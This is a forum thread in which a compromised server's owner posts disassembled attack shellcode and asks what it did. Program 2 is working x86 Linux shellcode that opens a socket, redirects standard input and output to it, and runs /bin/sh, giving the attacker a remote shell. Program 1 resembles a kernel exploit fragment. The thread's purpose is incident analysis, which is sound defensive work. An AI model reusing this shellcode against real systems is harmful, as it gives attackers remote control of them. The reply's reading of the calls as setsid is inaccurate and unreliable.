assembly code and security gurus. my linux box was hacked!

jumalinuxguy · 11-04-2013, 11:21 AM

hello friends

i run a personal web server that recently suffered an unfortunate break-in / hacking attempt. the server that was broken into is running CentOS 6.3 (old yes i know)

i have already taken the server offline to limit further damage and penetration to my home network.

recently, while attempting to do post-mortem analysis of the attacks which were used i find some shell code.

please forgive me i am ignorant to most technical code (also my english still very bad). my work friend help me to decrypt these shell codes. he says they are assembly but i know very little about assembly language programming so i come here to ask you if these programs look bad to you?

can some assembly guru here please tell me what these codes were used to do to my webserver ? i am pretty sure they broke into root account. and i have unplugged this machine so no more damage can be done.

but still i would like to know HOW they did it, and what the assembly programs exploited. so that i can better protect my server in the future.

thank you all much !!

assembly codes below.

Code:

program 1:
------SNIP--------
.data:0x00000000	0f01f8	swapgs	
 
.data:0x00000003	e805000000	call   func_0000000d	
 
.data:0x00000008	0f01f8	swapgs	
 
.data:0x0000000b	48	dec    eax	
 
.data:0x0000000c	cf	iret
------SNIP--------


program 2:
------SNIP--------
.data:0x00000000	31c0	xor    eax,eax	
 
.data:0x00000002	31db	xor    ebx,ebx	
 
.data:0x00000004	31c9	xor    ecx,ecx	
 
.data:0x00000006	31d2	xor    edx,edx	
 
.data:0x00000008	b066	mov    al,0x66	
 
.data:0x0000000a	b301	mov    bl,0x1	
 
.data:0x0000000c	51	push   ecx	
 
.data:0x0000000d	6a06	push   0x6	
; char* dst = arg[0]
.data:0x0000000f	6a01	push   0x1	
 
.data:0x00000011	6a02	push   0x2	
 
.data:0x00000013	89e1	mov    ecx,esp	
 
.data:0x00000015	cd80	int    0x80	
 
.data:0x00000017	89c6	mov    esi,eax	
 
.data:0x00000019	b066	mov    al,0x66	
 
.data:0x0000001b	31db	xor    ebx,ebx	
; while (c != 0)
.data:0x0000001d	b302	mov    bl,0x2	
 
.data:0x0000001f	6866686653	push   0x53666866	
 
.data:0x00000024	fec3	inc    bl	
 
.data:0x00000026	89e1	mov    ecx,esp	
 
.data:0x00000028	6a10	push   0x10	
 
.data:0x0000002a	51	push   ecx	
 
.data:0x0000002b	56	push   esi	
 
.data:0x0000002c	89e1	mov    ecx,esp	
 
.data:0x0000002e	cd80	int    0x80	
 
.data:0x00000030	31c9	xor    ecx,ecx	
 
.data:0x00000032	b103	mov    cl,0x3	
 
.data:0x00000034			
.data:0x00000034		loc_00000034:	
┏▶	.data:0x00000034	fec9	dec    cl	
 
┃ 	.data:0x00000036	b03f	mov    al,0x3f	
 
┃ 	.data:0x00000038	cd80	int    0x80	
 
┗ 	.data:0x0000003a	75f8	jne    loc_00000034	
 
.data:0x0000003c	31c0	xor    eax,eax	
 
.data:0x0000003e	52	push   edx	
 
.data:0x0000003f	686e2f7368	push   0x68732f6e	
 
.data:0x00000044	682f2f6269	push   0x69622f2f	
 
.data:0x00000049	89e3	mov    ebx,esp	
 
.data:0x0000004b	52	push   edx	
 
.data:0x0000004c	53	push   ebx	
 
.data:0x0000004d	89e1	mov    ecx,esp	
 
.data:0x0000004f	52	push   edx	
 
.data:0x00000050	89e2	mov    edx,esp	
 
.data:0x00000052	b00b	mov    al,0xb	
 
.data:0x00000054	cd80	int    0x80
------SNIP--------

thank you all and well wishes!

kbp · 11-05-2013, 05:24 AM

I'm not a guru but it looks like the code tries to spawn a new process, if I'm reading correctly there are 2 calls to setsid() then a call to dup2() followed by a call to execve(). I'm not sure what process it wants but there are a few strange pushes (all printable ascii chars) so it may be attempting to build the file name on the stack.

As far as determining which service it exploited I can't tell, it may be possible to run the binary/shellcode through Virus Total and get a hit which may lead you to more information about what the exploit targets.